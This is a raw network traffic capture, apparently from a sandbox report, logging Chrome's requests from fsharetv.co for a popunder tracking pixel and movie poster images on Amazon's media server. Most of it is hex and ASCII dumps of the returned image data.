                                                                                                                                                                                          Connection: close
                                                                                                                                                                                          access-control-allow-origin: *
                                                                                                                                                                                          CF-Cache-Status: DYNAMIC
                                                                                                                                                                                          Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=v%2FL5FcZ3EbJgsxEK6sUEVH7zMiGptiDqgpsHcjLM3X2LYqqpzGJumAO8DgaJoLjC%2FS9234rKwA53AFVXjr9MJAe8umiEOmYcsBtNEZJRaJSfmpLxtyWBrlduDAtoS6T7PF5%2FIQ%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                                          NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                                          Server: cloudflare
                                                                                                                                                                                          CF-RAY: 8f262578bc7943ca-EWR
                                                                                                                                                                                          alt-svc: h3=":443"; ma=86400
                                                                                                                                                                                          server-timing: cfL4;desc="?proto=TCP&rtt=2420&min_rtt=2415&rtt_var=917&sent=5&recv=7&lost=0&retrans=0&sent_bytes=2842&recv_bytes=1298&delivery_rate=1186991&cwnd=223&unsent_bytes=0&cid=a504b0ebe60831ce&ts=463&x=0"


                                                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                          125192.168.2.1649865172.67.183.1594436700C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                                                                          2024-12-15 11:38:15 UTC584OUTGET /popunder.gif HTTP/1.1
                                                                                                                                                                                          Host: bineukdwithme.com
                                                                                                                                                                                          Connection: keep-alive
                                                                                                                                                                                          sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                                                          sec-ch-ua-mobile: ?0
                                                                                                                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                          sec-ch-ua-platform: "Windows"
                                                                                                                                                                                          Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
                                                                                                                                                                                          Sec-Fetch-Site: cross-site
                                                                                                                                                                                          Sec-Fetch-Mode: no-cors
                                                                                                                                                                                          Sec-Fetch-Dest: image
                                                                                                                                                                                          Referer: https://fsharetv.co/
                                                                                                                                                                                          Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                          Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                          2024-12-15 11:38:16 UTC941INHTTP/1.1 200 OK
                                                                                                                                                                                          Date: Sun, 15 Dec 2024 11:38:16 GMT
                                                                                                                                                                                          Content-Type: image/gif
                                                                                                                                                                                          Transfer-Encoding: chunked
                                                                                                                                                                                          Connection: close
                                                                                                                                                                                          access-control-allow-origin: *
                                                                                                                                                                                          Pragma: public
                                                                                                                                                                                          cache-control: public, max-age=604800, immutable
                                                                                                                                                                                          CF-Cache-Status: HIT
                                                                                                                                                                                          Age: 507782
                                                                                                                                                                                          Last-Modified: Mon, 09 Dec 2024 14:35:14 GMT
                                                                                                                                                                                          Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=NUV25%2FfgTcNIGKCZL4N6eYJVEQncIHFp4ZfCYGXGy%2FsKocJD3nCoGqdxUnbThfSfy9AS6yxG06Ue%2BGH16jB1nVZrFBHJ7xMh%2BiuJg3%2FgXT%2Bneu4Ofy3nniLWKwaEHP%2Bw%2B3cYaQ%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                                          NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                                          Server: cloudflare
                                                                                                                                                                                          CF-RAY: 8f26257a1c1242fe-EWR
                                                                                                                                                                                          alt-svc: h3=":443"; ma=86400
                                                                                                                                                                                          server-timing: cfL4;desc="?proto=TCP&rtt=1761&min_rtt=1754&rtt_var=673&sent=5&recv=6&lost=0&retrans=0&sent_bytes=2840&recv_bytes=1162&delivery_rate=1608815&cwnd=69&unsent_bytes=0&cid=3edf9987f1d822e8&ts=453&x=0"
                                                                                                                                                                                          2024-12-15 11:38:16 UTC41INData Raw: 32 33 0d 0a 47 49 46 38 39 61 01 00 01 00 80 ff 00 ff ff ff 00 00 00 2c 00 00 00 00 01 00 01 00 00 02 02 44 01 00 3b 0d 0a
                                                                                                                                                                                          Data Ascii: 23GIF89a,D;
                                                                                                                                                                                          2024-12-15 11:38:16 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                          Data Ascii: 0


                                                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                          126192.168.2.1649867151.101.193.164436700C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                                                                          2024-12-15 11:38:16 UTC644OUTGET /images/M/MV5BMjIxOTIyNjE4OF5BMl5BanBnXkFtZTgwMDc5NTY2MDE@._V1_SX300.jpg HTTP/1.1
                                                                                                                                                                                          Host: m.media-amazon.com
                                                                                                                                                                                          Connection: keep-alive
                                                                                                                                                                                          sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                                                          sec-ch-ua-mobile: ?0
                                                                                                                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                          sec-ch-ua-platform: "Windows"
                                                                                                                                                                                          Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
                                                                                                                                                                                          Sec-Fetch-Site: cross-site
                                                                                                                                                                                          Sec-Fetch-Mode: no-cors
                                                                                                                                                                                          Sec-Fetch-Dest: image
                                                                                                                                                                                          Referer: https://fsharetv.co/
                                                                                                                                                                                          Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                          Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                          2024-12-15 11:38:16 UTC614INHTTP/1.1 200 OK
                                                                                                                                                                                          Connection: close
                                                                                                                                                                                          Content-Length: 32570
                                                                                                                                                                                          Content-Type: image/jpeg
                                                                                                                                                                                          X-Amz-IR-Id: c20869f7-294d-48da-8e5c-31cbc966f2ef
                                                                                                                                                                                          Cache-Control: max-age=630720000,public
                                                                                                                                                                                          Last-Modified: Thu, 21 Nov 2013 16:11:56 GMT
                                                                                                                                                                                          Access-Control-Allow-Origin: *
                                                                                                                                                                                          Expires: Tue, 06 Dec 2044 15:08:22 GMT
                                                                                                                                                                                          X-Nginx-Cache-Status: HIT
                                                                                                                                                                                          Accept-Ranges: bytes
                                                                                                                                                                                          Age: 13286
                                                                                                                                                                                          Date: Sun, 15 Dec 2024 11:38:16 GMT
                                                                                                                                                                                          X-Served-By: cache-iad-kiad7000065-IAD, cache-ewr-kewr1740047-EWR
                                                                                                                                                                                          X-Cache: HIT from fastly, MISS from fastly
                                                                                                                                                                                          Server-Timing: provider;desc="fy"
                                                                                                                                                                                          alt-svc: h3=":443";ma=86400,h3-29=":443";ma=86400,h3-27=":443";ma=86400
                                                                                                                                                                                          2024-12-15 11:38:16 UTC1378INData Raw: ff d8 ff e0 00 10 4a 46 49 46 00 01 01 00 00 01 00 01 00 00 ff db 00 84 00 05 05 05 09 06 09 09 09 09 0c 13 0e 0e 0c 0e 0e 19 12 0e 12 10 17 0e 10 10 17 10 17 17 10 14 17 14 14 1a 17 13 13 17 1a 14 17 18 23 18 1c 19 1f 1a 18 21 18 23 18 23 22 22 24 27 28 23 17 27 35 01 09 09 05 09 09 09 0c 09 09 13 21 17 0e 1a 22 1c 0c 18 29 22 28 1a 22 24 22 22 19 2c 22 28 21 22 14 23 22 1a 1f 1f 1a 1a 1c 18 1c 22 1a 24 24 23 0e 19 24 21 17 2f 19 1a 17 22 21 27 1f 17 24 2a ff c2 00 11 08 01 a9 01 2c 03 01 22 00 02 11 01 03 11 01 ff c4 00 35 00 00 01 04 03 01 00 00 00 00 00 00 00 00 00 00 00 06 02 04 05 07 01 03 08 00 01 00 01 05 01 01 00 00 00 00 00 00 00 00 00 00 00 01 00 02 03 04 05 06 07 ff da 00 0c 03 01 00 02 10 03 10 00 00 00 28 c6 69 9c db 87 1b 06 5a ea e4 db 78
                                                                                                                                                                                          Data Ascii: JFIF#!##""$'(#'5!")"("$"","(!"#""$$#$!/"!'$*,"5(iZx
                                                                                                                                                                                          2024-12-15 11:38:16 UTC1378INData Raw: 05 a9 2c f6 73 00 99 00 fd 4b 5d d6 9c 27 ce 75 32 9c 42 4c 02 29 5d 0d 7d 33 10 77 3a 10 c8 1e 6e da ea 57 4a 84 9b c3 4a ef 20 84 10 a3 98 29 a1 e9 9e 4e c4 8e 36 42 b6 96 7c 05 66 d7 3b 16 e2 18 e7 2d 8a 48 ee 1b e5 85 55 71 26 06 9b aa d2 54 f3 6a 83 34 16 30 af 1c 15 15 d3 a1 af 8e b3 26 26 10 9e 09 cb 6e b9 b4 de ee 71 8f b1 59 e0 75 57 b2 70 8e 46 92 aa 5b 5e a2 d8 a9 47 b7 94 89 f4 1c 98 4c 2e 4e ab 27 1b 3a 6f a3 33 f8 42 58 e8 c3 56 36 e4 02 31 f1 73 3b e6 36 4d 75 7c 54 75 42 a1 0c 61 66 53 54 f5 d6 f2 bb 68 97 82 5a c8 bd a0 2c 12 5a 72 c5 2e 2c 16 bc fa c4 8a 85 5f 03 bb 87 99 27 a6 86 58 ce a8 35 42 f1 2e 86 9c 36 2a 88 92 c0 dc 3e b2 fc 4e 13 c8 50 f5 2b 73 d4 1b 34 a8 d9 51 e9 4e fb 27 4c d4 68 f8 4f 2c 00 83 14 5a cc 6c bc c4 b4 97 40 c4
                                                                                                                                                                                          Data Ascii: ,sK]'u2BL)]}3w:nWJJ )N6B|f;-HUq&Tj40&&nqYuWpF[^GL.N':o3BXV61s;6Mu|TuBafSThZ,Zr.,_'X5B.6*>NP+s4QN'LhO,Zl@
                                                                                                                                                                                          2024-12-15 11:38:16 UTC1378INData Raw: 8b e9 d9 60 39 f2 76 48 af ed 38 d5 cc 7a 25 82 3a 88 33 81 1e 17 34 3f af cd 96 0b 38 de 09 e0 a4 23 98 d6 82 40 d7 53 02 d8 74 44 30 ec 30 81 f2 5b c3 08 ab 8b 0d ea ee 59 b6 6a fb 2c 6d 8f 64 1d e7 d5 ce 18 4c 62 bd a5 29 78 f5 42 a4 fb d1 98 28 c0 53 4e 02 f7 bd e7 af 2b de 4b 76 fd 1b 09 bd 35 2b 5f 37 e9 09 1e 9f 8d d0 c1 aa b5 ef d5 a7 c9 f9 c3 4c b4 e9 5f b0 46 7c a4 a4 9c 2d 29 63 d9 c2 49 46 cc 25 7b d1 f7 a5 08 e5 9c e3 21 7b d8 c0 59 9c 84 49 56 34 c5 3f d2 e8 73 76 b5 a5 14 e3 ca 49 3e c6 52 f2 d0 a4 b6 6c d6 b4 7f ff c4 00 31 10 00 02 01 03 03 02 05 04 02 03 00 03 01 01 00 00 01 02 03 00 04 11 05 12 13 10 21 14 20 22 31 32 23 30 33 41 15 42 24 34 51 40 43 52 45 61 ff da 00 08 01 01 00 01 08 02 e8 d7 d1 8f 68 ef 62 7e df f9 fc a9 e5 bb 66 b9
                                                                                                                                                                                          Data Ascii: `9vH8z%:34?8#@StD00[Yj,mdLb)xB(SN+Kv5+_7L_F|-)cIF%{!{YIV4?svI>Rl1! "12#03AB$4Q@CREahb~f
                                                                                                                                                                                          2024-12-15 11:38:16 UTC1378INData Raw: 68 b8 a3 44 a3 32 03 8e 91 ea 2b 2c a1 15 f5 44 0c 00 d5 9f e9 a0 16 d7 3e 1f 71 0f 24 b3 f7 30 c5 c7 04 b3 d6 9c 9f 55 6b 55 3f 52 21 5b 8b 04 8c 38 da 64 5a 9e 6e 18 b7 d6 9f 1e e9 37 1d 4d be 98 5a b3 1b a6 8e b1 d0 8e 86 8b 0a 66 a9 ea 6a 35 a6 4e 21 93 d5 e5 9f 4a 95 1d 8c 5f f6 a2 5d 88 ab 57 33 f0 21 6a d3 e0 e5 7d ed 71 7a d7 07 8e 19 22 68 db 6b d9 4a 7c 3b 1a 8b b2 ad 5c 42 d0 08 dd b3 fa ad 36 14 60 59 ab 54 fc 0d 5a 67 e4 6a d4 8f f9 15 60 9b e5 15 3f e5 9e af df d1 6e 2b 4c f8 bd 6a 12 ef 7c 56 9b f9 c7 4c 53 b6 df 76 90 fe 89 ff 00 b9 14 69 df 3e ef 10 63 da 5b 52 3d 96 13 56 f3 c9 0d 43 72 b2 f6 f2 c2 37 ec a3 da ae 25 6b c9 02 a5 eb 8b 74 16 e9 a6 db ec 4d e6 69 5a 56 62 d2 a0 82 09 15 60 8f 71 8d 69 d4 38 2a 75 20 16 54 03 4b fc 66 a4 95
                                                                                                                                                                                          Data Ascii: hD2+,D>q$0UkU?R![8dZn7MZfj5N!J_]W3!j}qz"hkJ|;\B6`YTZgj`?n+Lj|VLSvi>c[R=VCr7%ktMiZVb`qi8*u TKf
                                                                                                                                                                                          2024-12-15 11:38:16 UTC1378INData Raw: b4 5a b8 fc 66 9a 33 26 ec 2c 7b 0b 66 d3 88 77 78 e1 2e 24 2b 6f 36 d2 92 54 d2 f2 bb 31 b0 4d b0 ae 75 55 e3 98 39 b0 b5 df f5 1a 4d 32 58 8f d2 b6 d3 c8 3b a5 d4 2d b7 8c d3 a6 0f 70 2a 28 17 68 85 76 04 3e 99 18 cc 3d 07 4e 1f a1 6f 34 79 db 72 24 01 77 56 e6 96 b1 56 32 05 93 ba ae 3b d7 bd 5e ae 1b 3e 5d 45 b1 20 a8 46 d6 a9 53 70 ec b0 e7 dd 98 20 a8 fb c8 0d 71 72 47 20 a8 a4 f8 b0 e1 91 d1 9d 60 b6 79 8d 47 1a c4 36 8f e3 65 46 2a ab 65 0e 15 49 ef 4c 81 86 0f 56 38 f7 b9 b7 53 ca c9 56 57 e6 db d3 49 76 b7 1f 3e 50 7a b0 0d d8 cf 17 1b 91 40 fe fa 2f bd 5b 9c a0 ca 55 f0 ec 3c ba b4 59 5d c2 41 9e e1 6e 01 f9 19 ff 00 e1 39 ef 50 0e e4 d2 c9 b5 85 41 68 18 fa 54 e3 b5 67 15 be b3 42 81 eb 8f f9 79 76 b6 eb ba b7 4d 73 ea 36 96 a8 1c e5 d4 a1 2a
                                                                                                                                                                                          Data Ascii: Zf3&,{fwx.$+o6T1MuU9M2X;-p*(hv>=No4yr$wVV2;^>]E FSp qrG `yG6eF*eILV8SVWIv>Pz@/[U<Y]An9PAhTgByvMs6*
                                                                                                                                                                                          2024-12-15 11:38:16 UTC1378INData Raw: db d2 58 63 99 b7 b2 c2 8b f0 55 a0 bd 35 6b 7d c9 be 8f 41 13 9a 8b 4d 91 f1 96 b0 c5 25 a8 5e f5 8c 76 4b eb 61 6c 11 3c f6 b1 8b 58 da 49 26 99 a7 62 ed f7 15 da cd f3 51 4e 18 64 6f 06 88 a7 8a 84 ea ae 11 f1 8e b3 2e e5 22 a4 4d 8c 56 81 c5 5b 5f e7 01 81 14 d8 03 34 33 2f c6 28 c2 7b 6a 17 1c f3 33 0f 2e 9f 6d cc d9 ad 42 e4 4a 76 27 99 f1 b8 ed f3 66 b7 b5 99 ca ad da c8 3b 2c b4 45 4b 10 90 61 b6 4d 6a 7e 9d b5 e0 98 52 b0 3d c5 6a 43 12 f5 47 28 72 2d f5 08 07 e4 6d 46 10 bb aa eb 54 79 c1 55 f2 c6 86 46 0a 2f 9c 5b 44 22 5a 1e 6f 7f b0 c3 70 c1 47 e1 72 2a 39 76 f7 0a ff 00 f3 e5 45 69 ad f7 77 19 23 dd 65 35 a8 ca 1d c6 3a 63 ca 7c 9a 54 20 6e 99 ae 26 33 3b 39 fb f7 12 f1 ad 66 93 0d eb 8d 5d e3 1b 95 2f 56 92 7c d0 21 aa e2 af db 62 f5 f0 92
                                                                                                                                                                                          Data Ascii: XcU5k}AM%^vKal<XI&bQNdo."MV[_43/({j3.mBJv'f;,EKaMj~R=jCG(r-mFTyUF/[D"ZopGr*9vEiw#e5:c|T n&3;9f]/V|!b
                                                                                                                                                                                          2024-12-15 11:38:16 UTC1378INData Raw: 1d 68 79 5e 26 0a 36 cd 58 75 81 7d f3 8c e3 25 af 0a 34 a7 d0 ae c1 19 d8 41 d6 22 91 b3 83 7e 95 e8 cb 66 64 82 01 07 0d c1 7d b6 b8 ae b0 ad cb 4a 68 cd c9 50 4a bc 85 8a f1 0c 8a bb 4d 22 44 bc e7 13 05 19 6b d2 83 8b e3 b9 14 96 59 ea c7 d3 6f 63 8d 93 92 7e 43 a5 2c f1 b1 43 24 fc 7f 01 56 b4 70 dc e4 ed 37 ee 28 cd 9c df a1 3d cc 71 54 fc 1c de 74 b7 21 4e ad c7 92 d7 51 70 f4 e9 71 f0 08 3a 66 a8 ac 2c 72 f3 d7 e8 4f ad 90 cd c9 71 5d 13 0c 96 6f d6 b3 5f a3 78 b3 35 79 e9 f2 bd 65 05 1b f2 ac 15 f9 a9 6e 71 7c 95 f9 78 c2 95 f8 28 e7 93 91 ac 6f c7 c5 f9 27 ac f7 3a 8d 22 cb bf f6 82 3b b0 d9 03 e1 ac b1 c5 6d 1c 13 2e b0 38 3e 90 c4 5e 54 41 ce 70 53 5f 9e 95 58 e9 59 ad 6a c0 af 5f a7 ec c9 7e fd de 46 4e 9e b4 e2 b7 25 69 fa 72 67 3c a4 60 dc
                                                                                                                                                                                          Data Ascii: hy^&6Xu}%4A"~fd}JhPJM"DkYoc~C,C$Vp7(=qTt!NQpq:f,rOq]o_x5yenq|x(o':";m.8>^TApS_XYj_~FN%irg<`
                                                                                                                                                                                          2024-12-15 11:38:16 UTC1378INData Raw: 10 dc 20 b7 4e 01 76 ec 57 0c 34 0b 81 82 d0 48 85 f0 e4 0f bb 3c a3 01 9e 4f 79 05 bb 98 1f 4e 46 bb 0e 01 7b ef b0 e1 86 8f 93 e3 35 bc 76 0a 6a b1 c3 d0 bc 2a 4a d0 01 f0 8f c4 f0 cf 16 1d 02 9c 30 26 6e 0a 40 82 ac c8 53 4e cf 1f b3 3c 5e b2 78 fd 88 2a cc 9d 3d ec 6a 8e 92 a1 5c c4 af a2 e4 64 4e a4 3f e8 b8 a0 ec 17 52 3d 03 65 6b f9 56 46 1a a2 ca c8 d0 5a b1 bb e6 a8 00 4f 9e 91 3c 95 e7 68 ad 5b ff 00 ad dc 91 5a 9c 1f 28 df d8 f9 55 fe c7 ca d3 fd a7 c8 50 e7 07 9e 98 2e a1 bf 01 50 cb 93 54 41 59 22 2a e3 b0 3e 27 2b a5 0e a1 11 6a 70 be 98 77 62 f1 15 95 fb b2 02 af d8 fe 88 f8 fb ca 3f 0f bc 93 fc a0 1f 5d 49 38 28 da 55 d9 df 95 5f 8c 34 ed fc c9 05 cc c9 9f 76 58 ca c3 2b 72 cb a7 23 58 11 4b 1a 9c ba f6 39 f5 7b 82 fe b6 6c 4b 7a 3a b4 16
                                                                                                                                                                                          Data Ascii: NvW4H<OyNF{5vj*J0&n@SN<^x*=j\dN?R=ekVFZO<h[Z(UP.PTAY"*>'+jpwb?]I8(U_4vX+r#XK9{lKz:
                                                                                                                                                                                          2024-12-15 11:38:16 UTC1378INData Raw: a2 b2 92 ff da 00 08 01 01 00 09 3f 02 b2 3c 02 2e e3 09 fe fd a1 d7 27 55 fd 77 f5 a2 7b 5f 3a 2a d2 9f 28 a5 17 6e 75 3d 91 71 f8 51 73 dc fe 6b 6c f6 57 3c 26 8e 64 b7 28 18 7b 23 21 18 de 13 5a ba b1 59 ad 97 2d 66 49 0d 58 d4 58 6e 0a ac c9 1c e7 4f 78 53 1a d6 18 92 5d b9 18 34 f7 d9 46 bb 23 8a d3 e0 af 18 ce 4d 3d 94 5f 8a d1 46 24 9e 4a 0c 91 dd 17 83 2a a9 99 2c 33 9a c2 08 32 41 4d 3f 19 f1 b9 d3 58 77 34 d0 80 71 18 ca 0d b1 3b 2e 2a 80 4d 0d bf 75 d5 78 d9 e5 45 7a 11 fd 4e c1 6c 98 f0 2a 4e 70 de 81 cf 94 26 a2 61 ee aa 23 0b 82 1a d2 de e5 3c d7 a9 34 0b f8 d8 22 db 70 82 32 f4 52 0d 41 09 b7 66 b0 27 9a 90 7b ca bd c2 0a 4d 89 ba a9 9c e8 ba fd ce 51 84 6a b5 48 1d 56 d3 45 6b 02 79 a1 9b 7a 96 31 77 05 2f 24 70 4f 73 83 4c e7 10 9b 9b 5a
                                                                                                                                                                                          Data Ascii: ?<.'Uw{_:*(nu=qQsklW<&d({#!ZY-fIXXnOxS]4F#M=_F$J*,32AM?Xw4q;.*MuxEzNl*Np&a#<4"p2RAf'{MQjHVEkyz1w/$pOsLZ
                                                                                                                                                                                          2024-12-15 11:38:16 UTC1378INData Raw: e5 55 57 a9 36 cc f7 85 2a 6f 59 cc dc f7 10 9d fe 33 ea 85 90 47 1c 54 d0 3f de 8a 00 28 03 b5 ed ee 9a 44 1e 28 01 c0 59 21 65 d6 d7 27 c2 56 d0 f2 54 b3 90 5b d4 dd 60 7f ad e9 92 cf 15 24 ec 47 c1 a7 c9 32 f7 1b 23 93 47 1e b0 3d 2c 0f 1d d1 ff 00 5b f8 df a0 85 b7 e5 c3 ca da 0f 34 3b b9 35 9b e1 22 3a 21 1b 93 5c 82 7e 7b 2d 4f 7a a5 90 64 3e 28 50 2e 96 eb 53 7a ac f4 fc d7 e1 43 45 3f 24 e6 e7 5b 91 06 2c 97 b9 ca 44 db d2 b6 8b 7d 9e 8d b5 43 41 1c 8a e4 9f 73 c9 60 dd c6 7c ac 9a 95 5f b5 f6 4f 6c 51 99 33 d6 65 4c e4 75 aa 8b 3e 2a 8e 39 37 29 b8 be db 8f 92 6b 15 f4 ca 97 86 88 64 9f 75 2b 44 77 44 a7 b6 77 48 7f b5 54 37 8c e7 fa 26 b8 02 ec ee 76 42 e7 64 d6 dd 4f fc fd 94 80 fc 64 1b c5 bf 1f 13 d0 68 7f 19 0c bc 10 27 b3 67 44 1c 2f 32 0a
                                                                                                                                                                                          Data Ascii: UW6*oY3GT?(D(Y!e'VT[`$G2#G=,[4;5":!\~{-Ozd>(P.SzCE?$[,D}CAs`|_OlQ3eLu>*97)kdu+DwDwHT7&vBdOdh'gD/2


                                                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                          127192.168.2.1649868151.101.193.164436700C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                                                                          2024-12-15 11:38:16 UTC676OUTGET /images/M/MV5BYjliZjQ1NGMtNjU1MS00M2RmLThkN2UtM2NlNTJjM2FjYTk1XkEyXkFqcGdeQXVyMjgyNjk3MzE@._V1_SX300.jpg HTTP/1.1
                                                                                                                                                                                          Host: m.media-amazon.com
                                                                                                                                                                                          Connection: keep-alive
                                                                                                                                                                                          sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                                                          sec-ch-ua-mobile: ?0
                                                                                                                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                          sec-ch-ua-platform: "Windows"
                                                                                                                                                                                          Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
                                                                                                                                                                                          Sec-Fetch-Site: cross-site
                                                                                                                                                                                          Sec-Fetch-Mode: no-cors
                                                                                                                                                                                          Sec-Fetch-Dest: image
                                                                                                                                                                                          Referer: https://fsharetv.co/
                                                                                                                                                                                          Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                          Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                          2024-12-15 11:38:16 UTC615INHTTP/1.1 200 OK
                                                                                                                                                                                          Connection: close
                                                                                                                                                                                          Content-Length: 20870
                                                                                                                                                                                          Content-Type: image/jpeg
                                                                                                                                                                                          X-Amz-IR-Id: e068ad17-40f8-4e37-a931-2b1d22e71f18
                                                                                                                                                                                          Cache-Control: max-age=630720000,public
                                                                                                                                                                                          Last-Modified: Sun, 12 Feb 2017 10:07:04 GMT
                                                                                                                                                                                          Access-Control-Allow-Origin: *
                                                                                                                                                                                          Expires: Sat, 01 Oct 2044 18:28:16 GMT
                                                                                                                                                                                          X-Nginx-Cache-Status: HIT
                                                                                                                                                                                          Accept-Ranges: bytes
                                                                                                                                                                                          Age: 3716515
                                                                                                                                                                                          Date: Sun, 15 Dec 2024 11:38:16 GMT
                                                                                                                                                                                          X-Served-By: cache-iad-kiad7000081-IAD, cache-ewr-kewr1740064-EWR
                                                                                                                                                                                          X-Cache: HIT from fastly, HIT from fastly
                                                                                                                                                                                          Server-Timing: provider;desc="fy"
                                                                                                                                                                                          alt-svc: h3=":443";ma=86400,h3-29=":443";ma=86400,h3-27=":443";ma=86400
                                                                                                                                                                                          2024-12-15 11:38:16 UTC1378INData Raw: ff d8 ff e0 00 10 4a 46 49 46 00 01 01 00 00 01 00 01 00 00 ff db 00 84 00 05 05 05 09 06 09 09 09 09 0c 13 0e 0e 0c 0e 0e 19 12 0e 12 10 17 0e 10 10 17 10 17 17 10 14 17 14 14 1a 17 13 13 17 1a 14 17 18 23 18 1c 19 1f 1a 18 21 18 23 18 23 22 22 24 27 28 23 17 27 35 01 09 09 05 09 09 09 0c 09 09 13 21 17 0e 1a 22 1c 0c 18 29 22 28 1a 22 24 22 22 19 2c 22 28 21 22 14 23 22 1a 1f 1f 1a 1a 1c 18 1c 22 1a 24 24 23 0e 19 24 21 17 2f 19 1a 17 22 21 27 1f 17 24 2a ff c2 00 11 08 01 92 01 2c 03 01 22 00 02 11 01 03 11 01 ff c4 00 34 00 00 01 05 01 01 01 00 00 00 00 00 00 00 00 00 00 05 02 03 04 06 07 01 00 08 01 00 03 01 01 01 01 00 00 00 00 00 00 00 00 00 00 00 01 02 03 04 05 06 ff da 00 0c 03 01 00 02 10 03 10 00 00 00 fa 0b a9 ec 8a f7 3a 1d f7 94 1c ef 54 1c
                                                                                                                                                                                          Data Ascii: JFIF#!##""$'(#'5!")"("$"","(!"#""$$#$!/"!'$*,"4:T
                                                                                                                                                                                          2024-12-15 11:38:16 UTC1378INData Raw: 88 86 5a 5f 36 cb a3 cf a4 6c 32 cb a0 f7 15 2e 23 9a e6 ec 74 7b 2d a5 29 88 f9 e8 6b a3 24 45 98 d5 71 8b 0f 2e 9a 4b 44 63 72 92 46 38 a9 71 27 16 46 d0 23 d2 91 14 da 16 da a9 3e 8e f1 2d 36 f2 22 a3 41 21 06 69 bf 21 59 d5 fe ed 4b ba fd 1f 8b cc 83 60 c5 a4 e1 51 92 b8 fa 6b 54 0b 3d 53 a4 62 2a fb ac c7 4a 99 29 3e e2 10 e7 22 f1 13 bb 0d 4a 89 4c 03 3b 3d 75 cb 9e 0b ba f0 6a c2 5e a8 63 57 ef 42 11 d1 91 b8 75 73 f9 6a fa c8 49 20 3b 84 9b 73 1a 3c d6 53 83 00 94 4c 34 1e e2 95 17 7d b9 d3 6e 9f 47 e2 a3 12 db b1 74 7a 1c c0 1c bd 15 c0 87 c4 6c 09 7e 63 d6 05 87 62 8b 16 2b a6 3a dd 6d 16 46 da 04 c9 e6 d0 12 5c b7 d5 46 bf d3 0f 72 6f a5 62 9a ff 00 cf d6 58 3b 52 9d bd 1d f0 34 88 e5 86 83 d4 b5 53 e0 af 5c 5a 4e ec 88 f8 66 d4 67 59 ca e3 3e
                                                                                                                                                                                          Data Ascii: Z_6l2.#t{-)k$Eq.KDcrF8q'F#>-6"A!i!YK`QkT=Sb*J)>"JL;=uj^cWBusjI ;s<SL4}nGtzl~cb+:mF\FrobX;R4S\ZNfgY>
                                                                                                                                                                                          2024-12-15 11:38:16 UTC1378INData Raw: 66 66 76 cc cc cc ce f9 99 99 db 33 33 94 e5 33 39 4e 53 9c e7 39 4e 53 4c 73 cb 77 f3 b6 26 20 68 26 26 a3 d4 95 3e 95 d2 ea 7a 8c 44 69 99 99 9f 8e 7e 39 8d 70 11 f5 e8 23 fa a7 fa 3e a2 c6 0d 7d 82 7f c8 b4 ff 00 91 31 75 ac 60 b7 33 9c ea 62 75 a7 a7 bf 2e 7b bf 9f 86 23 15 ac 16 6d 5e bd af fa 57 19 c2 aa 68 8e 90 75 5c fa 84 5f 50 1f 9a f5 28 f3 3f 0c ed 9d b9 cb 35 01 65 9e a2 4f 87 b9 9f ce 27 19 89 81 30 b1 5d 44 5b c4 ea ce a4 26 17 02 7a 23 64 dd bb f9 d8 6d 75 eb 42 f2 7d 46 a9 b5 27 2d 55 6d 79 e2 9a 4d 1a e9 c7 6b eb ea 29 12 da 8d 64 8d b3 12 f7 4f 09 ea 0c 3c d7 af 57 81 b3 06 e6 33 19 7b 72 9c 20 4c 46 6c 6d 98 15 8f 78 10 98 2a 81 66 27 18 53 1b 7a 17 9b b7 7f 27 61 1f d4 ea 4f 1a 87 7b 1b 95 95 27 55 d5 0d 54 ad 2b c5 76 d4 e9 3a 9d c3
                                                                                                                                                                                          Data Ascii: ffv3339NS9NSLsw& h&&>zDi~9p#>}1u`3bu.{#m^Whu\_P(?5eO'0]D[&z#dmuB}F'-UmyMk)dO<W3{r LFlmx*f'Sz'aO{'UT+v:
